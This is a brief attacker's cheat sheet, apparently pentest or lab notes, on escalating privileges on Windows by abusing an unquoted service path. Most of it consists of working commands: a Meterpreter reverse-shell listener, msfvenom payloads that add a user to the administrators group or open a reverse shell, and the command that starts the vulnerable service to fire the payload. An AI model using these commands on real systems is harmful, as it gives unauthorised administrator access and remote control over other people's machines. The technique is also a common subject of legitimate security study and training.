Executable path is not enclosed in quotations and has a space
Example:
Spaces in the path like: Program SPACE Files + Unquoted SPACE Path SPACE Service
How we can abuse that? We can add .exe in place of one of the spaces and it will run:
C:\Program Files\Unquoted(.exe)Path Service\Common.exeIn Kali:
Run Meterpreter listener:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
runMake a common.exe that adds user to admins:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exeOR Make a common.exe that gives you shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 -f exe -o x.exeIn Windows:
Start the service:
sc start unquotedsvc